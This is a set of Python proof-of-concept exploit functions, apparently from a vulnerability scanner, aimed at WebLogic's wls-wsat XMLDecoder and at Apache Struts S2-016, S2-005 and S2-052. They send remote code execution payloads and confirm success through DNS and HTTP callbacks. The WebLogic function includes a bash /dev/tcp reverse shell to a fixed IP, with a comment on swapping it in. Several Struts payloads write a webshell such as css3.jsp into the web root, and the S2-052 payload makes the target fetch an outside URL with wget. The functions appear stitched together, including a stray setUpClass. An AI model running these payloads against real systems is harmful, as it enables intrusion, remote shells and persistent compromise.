def poc(url):
url = url if '://' in url else 'http://' + url
url = url.split('#')[0].split('?')[0].rstrip('/')
mydnslog = Dnslog("weblogic-wls-xml")
cmd = mydnslog.getCommand("dns")
exec_cmd = '<array class="java.lang.String" length="{0}">'.format(
len(cmd.split()))
for i, c in enumerate(cmd.split()):
exec_cmd += '<void index="{0}"><string>{1}</string></void>'.format(
i, c)
exec_cmd += '</array>'
reverse_shell_cmd = '''
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.1.137/2000 0>&1</string>
</void>
</array>
'''
payload_data = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="java.lang.ProcessBuilder">
{}
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
vulurl = url + "/wls-wsat/CoordinatorPortType"
try:
headers = {'Content-Type': 'text/xml;charset=UTF-8'}
data = payload_data.format(exec_cmd) # 替换成reverse_shell_data就是反弹shell
resp = requests.post(vulurl, data=data, headers=headers, timeout=10)
if mydnslog.verifyDNS(3):
return "[weblogc-wls-xmldecoder][dnslog]" + url
if '<faultstring>java.lang.ProcessBuilder' in resp.text or "<faultstring>0" in resp.text:
return True
except Exception as e:
logging.debug(e)
return False
def poc(url):
url = url if '://' in url else 'http://' + url
url = url.split('#')[0].split('?')[0]
command = "echo rivirsirfortest"
mydnslog = Dnslog("s2016")
dns_cmd = mydnslog.getCommand("dns")
web_cmd = mydnslog.getCommand("web")
payloads = [
#执行命令payload
'${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRuntime().exec("%s").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}'
% command,
# 爆路径payload
"${#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#a=#req.getSession(),#b=#a.getServletContext(),#c=#b.getRealPath('/'),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#c),#matt.getWriter().flush(),#matt.getWriter().close()}",
# dns_cmd
'${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRuntime().exec("%s").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}'
% dns_cmd,
# web_cmd
'${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRuntime().exec("%s").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}'
% web_cmd,
# 写shell的payload
'#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest"),#b=new java.io.FileOutputStream(new java.lang.StringBuilder(#a.getRealPath("/")).append(@java.io.File@separator).append(#a.getParameter("name")).toString()),#b.write(#a.getParameter("t").getBytes()),#b.close(),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println("BINGO"),#genxor.flush(),#genxor.close()',
'#req=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest"),#p=(#req.getRealPath("/")+"css3.jsp").replaceAll("\\", "/"),new java.io.BufferedWriter(new java.io.FileWriter(#p)).append(#req.getParameter("c")).close()}'
]
for payload in payloads:
vulurl = url + '?redirect:%s' % urllib.quote(payload)
try:
resp = requests.get(vulurl, timeout=10)
if "rivirsirfortest" in resp.text:
#print resp.text
return True
if len(resp.text) <= 100 and "webapps" in resp.text:
return "[S2-016][web dir]%s" % resp.text + url
if mydnslog.verifyDNS(3):
return "[S2-016][dnslog]%s" + url
if mydnslog.verifyHTTP(3):
return "[S2-016][weblog]%s" + url
except Exception as e:
logging.debug(e)
return False
def poc(url):
"""无回显payload, 暂不提供检测"""
url = url if '://' in url else 'http://' + url
url = url.split('#')[0].split('?')[0]
command = "touch /tmp/success"
mydnslog = Dnslog("s2005")
dnslog_cmd = mydnslog.getCommand("dns")
print(dnslog_cmd)
web_curl_cmd = mydnslog.getCommand("web_curl")
payloads = [
# 无回显payload
"?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22{cmd}%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1"
.format(cmd=command),
# dnslog payload
"?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22{cmd}%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1"
.format(cmd=dnslog_cmd),
"?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22{cmd}%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1"
.format(cmd=web_curl_cmd)
]
page1 = requests.get(url)
for payload in payloads:
vulurl = url + payload
resp = requests.get(vulurl)
if mydnslog.verifyDNS(3):
return "[s2-005] " + url
if mydnslog.verifyHTTP(3):
return "[s2-005] " + url
return False
def setUpClass(cls):
cls.dnslog = Dnslog("weblogic")
cls.domain = cls.dnslog.getDomain()
cls.dns_command = cls.dnslog.getCommand("dns")
cls.web_command = cls.dnslog.getCommand("web")
def poc(url):
url = url if '://' in url else 'http://' + url
url = url.split('#')[0].split('?')[0].rstrip('/')
mydnslog = Dnslog("s2-052")
weburl = mydnslog.getWeburl()
print("weblog url: %s" % weburl)
payload = """<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>wget</string>
<string>{url}</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>""".format(url=weburl)
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
"Content-Type": "application/xml"
}
resp = requests.post(url, data=payload, headers=headers)
if mydnslog.verifyHTTP(3):
return "[S2-052][weblog] " + url